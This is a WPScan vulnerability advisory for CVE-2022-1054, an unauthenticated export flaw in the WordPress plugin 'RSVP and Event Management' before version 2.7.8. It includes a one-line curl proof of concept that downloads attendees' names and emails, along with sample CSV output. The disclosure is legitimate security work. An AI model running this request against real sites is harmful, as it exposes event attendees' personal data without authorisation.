WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export

Description

The plugin does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of users registered for events

Proof of Concept

curl "https://example.com/wp-admin/admin.php?page=rsvp-admin-export"

"First Name","Last Name","Email","RSVP Status","Kids Meal","Associated Attendees","Vegetarian","Note","Additional Attendee","pre-fill URL"
"test","test","[email protected]","Yes","N","","N","","N",""

Affects Plugins

rsvp
Fixed in version 2.7.8

References

CVE
CVE-2022-1054

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
95a5fad1-e823-4571-8640-19bf5436578d

Timeline

Publicly Published

2022-03-28 (about 4 months ago)

Added

2022-03-28 (about 4 months ago)

Last Updated

2022-04-11 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin